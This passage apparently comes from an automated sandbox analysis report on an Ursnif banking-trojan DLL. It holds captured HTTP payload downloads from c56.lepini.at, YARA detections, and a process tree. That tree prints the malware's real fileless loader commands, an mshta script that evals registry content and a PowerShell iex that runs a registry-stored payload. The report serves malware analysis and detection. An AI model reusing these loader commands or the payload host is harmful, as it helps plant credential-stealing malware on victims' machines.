                                                                                                                                      Data Raw: 37 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 93 45 b6 a4 50 00 43 17 c4 00 7d c8 10 77 77 66 b8 17 52 50 c8 ea fb f7 02 72 92 93 e4 0a 9f a5 f0 f9 03 cd 4b d3 90 be ac 60 e5 4f 17 64 55 6e 37 ea 19 51 a8 e5 e9 99 a2 c4 1f 56 1e 16 4e 3d 7b e0 ca 80 4a f5 47 b7 22 fb 31 a0 37 ba 9e 3d 3a 53 a0 15 63 50 ea 8b 52 79 3f 98 a9 9d 78 5c ef 52 d3 d3 ac bd 4b 09 d9 af a3 59 bd 52 a0 56 b9 f4 ea d9 19 b0 72 ab 29 66 97 af 34 55 cd 83 fd e5 69 48 11 50 f4 61 02 fa d5 c8 99 ca 08 0e 97 e2 5b 76 a8 53 57 0d b1 d1 10 ea 2b 33 1a ad 6b d8 a4 38 6d 66 c3 d7 5b fb f0 5b 3b 9e 9a ee 7c 00 3f 8c d1 ca 03 f6 e3 62 0d 97 c3 ef c4 28 2c 4d e6 7d c2 91 fa 59 d4 ce f4 bb a2 20 b1 bb 01 48 c7 e3 2c a0 50 bd 6a 86 2c cf ab 91 a9 43 b8 ec d4 95 75 0f c5 f7 47 92 dd 18 e3 a4 18 4d 17 09 f0 42 24 79 35 ae 51 d6 ad 17 59 61 ee f4 d0 22 de 12 46 d0 a0 43 97 e9 a9 59 fb 96 fa 55 e2 fb a8 fc 34 d9 c8 b6 9f 55 82 8e 64 27 6d 0a 0a 6c 28 b6 56 9b c3 06 41 ce 5f a6 dd 37 eb 47 81 04 a1 d5 2c fa 90 8a 87 7e a0 e5 c3 58 99 19 ee 9c ae bd f7 6b 38 da 5d 00 61 25 16 cb ed 12 22 79 51 ce 76 1b 9b 45 dc e5 17 0e cd db 1a 99 5f 35 02 cf f4 7c 14 7a 27 be 48 0f ce 4e 76 f1 9b 96 f1 83 91 aa ad 04 6a ae 2b b4 e6 3d f2 49 86 cf 7d 4f 63 30 d6 52 41 22 99 8b b8 42 44 05 20 58 ca 96 d2 ec d9 e7 99 11 81 64 e9 cc 39 2c da 10 f8 cb 79 98 ee 23 d4 07 fc 0d 70 c3 5b f7 eb 7f 70 25 68 ac e9 c2 3a 7f d3 e7 80 bc bd 46 b8 0a f1 da fe 81 ab 12 31 55 82 be 3e a2 fa 68 6b 76 81 3e 5c a7 d2 ee b6 11 c6 90 16 99 ca 6c 84 f3 84 b9 22 2a 9c d0 ba 13 6f f5 4b e7 de da da b1 56 88 31 60 3f f9 f6 45 7f 27 27 2c 11 88 b2 ae e8 2f 78 d3 66 26 c9 be 26 25 89 96 93 a9 5e 4f 18 84 05 e3 f0 96 dd 85 2b cb ae d7 f1 96 17 0c 27 c3 80 ca 1e 59 45 2d 0d ae f2 23 3a 4b 0e ba cd 14 3b 8f ba 83 d4 b3 2f 58 2b 8e 4f a5 92 1f c7 f8 e4 a8 79 c5 23 b8 5c 5b 02 91 d4 d3 59 d9 64 ea 26 9c 85 d2 b1 ed 9d 65 0f f2 15 d6 bc dd 18 25 cc 71 0c 25 cf 45 b3 a5 8f c4 3a 05 33 6e 03 d1 65 68 ff ae cc e6 87 ec 3d 31 08 03 fc ca 98 08 e5 1f 33 07 24 1d 37 51 98 b6 50 b9 10 a9 84 1f bb 95 52 10 3e ea 7a 13 c8 7e d2 1f 71 35 2f d4 62 2a 8f 1e 45 8b 9e b2 ca 66 b9 2a af 2d e9 51 e5 2b 49 6d 22 19 b3 ec 36 1e be be 78 1e 84 c0 4d 55 1f ab 44 aa cf 24 2e d9 f2 a4 cc cc 53 0b 1f 5c 45 ec 85 c9 6b 50 af 6a 3d 77 11 e3 8b f6 99 dc 0a 28 b2 11 ed 34 84 98 84 f4 11 23 df a6 90 f1 a8 62 c4 96 44 aa 26 0a 29 0a ae 21 3c d3 14 63 11 ca 8d 76 9b 21 05 29 66 e1 65 71 01 77 a2 b3 9f 41 ba 0c cd c2 c9 df 0f b2 50 99 44 07 2a 85 52 d8 a2 3f fc 19 3f 94 a7 45 77 0e d1 39 33 80 d1 8b ab 31 8b 48 43 a0 ad 72 7c 01 e8 11 7f 62 71 9c a5 e5 d5 93 83 be 50 ec 0c b3 64 ba 9d 90 72 82 e9 35 2b 74 d1 01 7c a1 87 6c f1 ba 8b 13 b3 78 82 8f 84 3e 22 b7 5c 0b 12 7a 7b aa 73 1c e9 cc a3 33 d3 ff 31 90 74 e2 83 cc 99 8e e8 3b 4a 6d c2 bc 31 fb 5d 19 54 d0 fa 23 6c b3 b7 b3 a8 de 86 e1 4b 23 b5 a2 c6 db 12 ec 77 fd 0f 5d 5d e7 62 0d 70 4e 37 df b3 4f 61 6d 36 10 e1 0d c6 c5 27 8e 10 4c 06 52 f1 99 a8 a0 eb 3b c2 36 ea 7e 99 79 b6 4e 1d d6 d1 cd e7 91 d6 51 ee 4e 2b 1b 30 8d b9 16 dc 4a e1 04 0f 78 28 e0 5e 3e 48 16 26 9b 8f c9 68 9a 59 af b8 88 5f ee 63 cc 8b 99 bc c3 6e 44
                                                                                                                                      Data Ascii: 73bEPC}wwfRPrK`OdUn7QVN={JG"17=:ScPRy?x\RKYRVr)f4UiHPa[vSW+3k8mf[[;|?b(,M}Y H,Pj,CuGMB$y5QYa"FCYU4Ud'ml(VA_7G,~Xk8]a%"yQvE_5|z'HNvj+=I}Oc0RA"BD Xd9,y#p[p%h:F1U>hkv>\l"*oKV1`?E'',/xf&&%^O+'YE-#:K;/X+Oy#\[Yd&e%q%E:3neh=13$7QPR>z~q5/b*Ef*-Q+Im"6xMUD$.S\EkPj=w(4#bD&)!<cv!)feqwAPD*R??Ew931HCr|bqPdr5+t|lx>"\z{s31t;Jm1]T#lK#w]]bpN7Oam6'LR;6~yNQN+0Jx(^>H&hY_cnD
                                                                                                                                      Nov 24, 2020 21:20:11.915086031 CET4543INData Raw: 6a 3b 1f fb 34 23 d9 ce 3c 93 84 63 7b 58 ea db 1f 8c 29 b6 3b 2a 98 6d 3e b0 a9 bb 1f cc 5f e0 9f 4f c4 00 19 e6 4d cf 62 f4 b1 de 32 8a bf e9 a4 05 2b 88 fa 0a a7 64 cd 61 f9 83 8b 8e 54 09 b1 65 1d 7f 9f 6f 8d 4f 42 13 b4 d5 b6 44 5d 32 7e 33
                                                                                                                                      Data Ascii: j;4#<c{X);*m>_OMb2+daTeoOBD]2~3[QKx9?2o+Cl.8A!o*>9nCAFiGEX<5@{%JY[$z>OwUm1q(HY,f!$?Ozb990{C


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      6192.168.2.34975847.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      Nov 24, 2020 21:20:47.541162014 CET4561OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Host: c56.lepini.at
                                                                                                                                      Nov 24, 2020 21:20:48.222243071 CET4570INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Tue, 24 Nov 2020 20:20:47 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 138820
                                                                                                                                      Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "5db6b84e-21e44"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                      Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
                                                                                                                                      Nov 24, 2020 21:20:48.222305059 CET4571INData Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8
                                                                                                                                      Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8|ymf&ASxYE6*Vfy
                                                                                                                                      Nov 24, 2020 21:20:48.222347021 CET4572INData Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1
                                                                                                                                      Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
                                                                                                                                      Nov 24, 2020 21:20:48.222404003 CET4574INData Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23
                                                                                                                                      Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
                                                                                                                                      Nov 24, 2020 21:20:48.222456932 CET4575INData Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4
                                                                                                                                      Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
                                                                                                                                      Nov 24, 2020 21:20:48.222507954 CET4577INData Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63
                                                                                                                                      Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
                                                                                                                                      Nov 24, 2020 21:20:48.222563028 CET4578INData Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1
                                                                                                                                      Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
                                                                                                                                      Nov 24, 2020 21:20:48.222618103 CET4579INData Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77
                                                                                                                                      Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
                                                                                                                                      Nov 24, 2020 21:20:48.222668886 CET4581INData Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed
                                                                                                                                      Data Ascii: ^P_L1l`>up_`O`RC'2*%[Tj0#*@J|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
                                                                                                                                      Nov 24, 2020 21:20:48.222723961 CET4582INData Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59
                                                                                                                                      Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv|&g6wHLTk?N~d>,<AHkPyhv?R
                                                                                                                                      Nov 24, 2020 21:20:48.484675884 CET4585INData Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41
                                                                                                                                      Data Ascii: hG&|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp


                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      Analysis Process: loaddll32.exe PID: 6780 Parent PID: 5700

                                                                                                                                      General

                                                                                                                                      Start time:21:18:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
                                                                                                                                      Imagebase:0xba0000
                                                                                                                                      File size:119808 bytes
                                                                                                                                      MD5 hash:76E2251D0E9772B9DA90208AD741A205
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 7128 Parent PID: 792

                                                                                                                                      General

                                                                                                                                      Start time:21:19:13
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 4812 Parent PID: 7128

                                                                                                                                      General

                                                                                                                                      Start time:21:19:14
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 6188 Parent PID: 792

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                      Imagebase:0x7ff66ff30000
                                                                                                                                      File size:823560 bytes
                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 4876 Parent PID: 6188

                                                                                                                                      General

                                                                                                                                      Start time:21:19:59
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: iexplore.exe PID: 3732 Parent PID: 6188

                                                                                                                                      General

                                                                                                                                      Start time:21:20:04
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
                                                                                                                                      Imagebase:0x1210000
                                                                                                                                      File size:822536 bytes
                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: mshta.exe PID: 5816 Parent PID: 3388

                                                                                                                                      General

                                                                                                                                      Start time:21:20:16
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                      Imagebase:0x7ff6232d0000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: powershell.exe PID: 5556 Parent PID: 5816

                                                                                                                                      General

                                                                                                                                      Start time:21:20:17
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                      Imagebase:0x7ff785e30000
                                                                                                                                      File size:447488 bytes
                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: conhost.exe PID: 1364 Parent PID: 5556
